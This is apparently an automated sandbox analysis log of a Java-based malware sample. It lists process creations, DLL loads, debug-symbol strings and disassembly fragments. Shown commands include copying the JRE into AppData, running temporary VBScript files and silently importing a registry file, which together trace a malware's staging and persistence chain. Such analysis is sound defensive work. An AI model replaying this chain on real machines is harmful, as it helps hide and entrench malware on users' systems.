Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: wsock32.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: winmm.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msdart.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msxml3.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wsock32.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: winmm.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: userenv.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dpapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: dwmapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: ntasn1.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: opengl32.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Section loaded: glu32.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: wsock32.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: winmm.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: userenv.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\regedit.exe Section loaded: authz.dll
Source: C:\Windows\SysWOW64\regedit.exe Section loaded: aclui.dll
Source: C:\Windows\SysWOW64\regedit.exe Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\regedit.exe Section loaded: clb.dll
Source: C:\Windows\SysWOW64\regedit.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\regedit.exe Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\regedit.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1699563884.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: xcopy.exe, 00000015.00000003.1728816995.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\hotspot\windows_i486_compiler1\product\jvm.pdbi source: xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\npjp2\obj\npjp2.pdb source: xcopy.exe, 00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjfr\jfr.pdb source: xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnet\net.pdb.. source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libzip\zip.pdb** source: xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libt2k\t2k.pdb source: xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdb source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005052000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000502A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnio\nio.pdb source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libsplashscreen\splashscreen.pdbjj source: xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libzip\zip.pdb source: xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libverify\verify.pdb source: xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsdt\jsdt.pdb source: xcopy.exe, 00000015.00000003.1725315701.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2pkcs11\j2pkcs11.pdb source: xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjaas\jaas_nt.pdb source: xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2pcsc\j2pcsc.pdb source: xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1698710106.00000000004DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jabswitch\jabswitch.pdb source: xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\x64\Release\CryptUtil.pdb source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005000000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000502A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libkrb5\w2k_lsa_auth.pdb source: xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\hotspot\windows_i486_compiler1\product\jvm.pdb source: xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\a01\_work\38\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: xcopy.exe, 00000015.00000003.1741105307.00000000004E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjawtaccessbridge-32\JAWTAccessBridge-32.pdb source: xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jabswitch\jabswitch.pdb,,+ source: xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1700108241.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2gss\j2gss.pdb source: xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjawt\jawt.pdb source: xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libsspi_bridge\sspi_bridge.pdb source: xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\liblcms\lcms.pdb source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1698710106.00000000004DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2pkcs11\j2pkcs11.pdb## source: xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\liblcms\lcms.pdb11 source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsoundds\jsoundds.pdb source: xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libdt_socket\dt_socket.pdb source: xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libmanagement\management.pdb&& source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsound\jsound.pdb## source: xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnpt\npt.pdb source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\npjp2\obj\npjp2.pdbEE, source: xcopy.exe, 00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1700293859.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Win10\Desktop\RetriveTitle_vb2010\Release\TitleWindow.pdb source: javaw.exe, 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A707000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libsplashscreen\splashscreen.pdb source: xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1699288851.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libt2k\t2k.pdb:: source: xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnio\nio.pdb'' source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnet\net.pdb source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsound\jsound.pdb source: xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libmanagement\management.pdb source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdbP8PP@Y source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005052000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000502A000.00000004.00000800.00020000.00000000.sdmp
Source: msvcp140.dll.21.dr Static PE information: 0xEDEDFA22 [Fri Jun 29 08:17:38 2096 UTC]
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73A945FB LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 6_2_73A945FB
Source: unpack200.exe.21.dr Static PE information: section name: .00cfg
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_02DFA21B push ecx; ret 2_2_02DFA225
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_02DFA20A push ecx; ret 2_2_02DFA21A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_02DFB3B7 push 00000000h; mov dword ptr [esp], esp 2_2_02DFB3DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_02DFBB67 push 00000000h; mov dword ptr [esp], esp 2_2_02DFBB8D
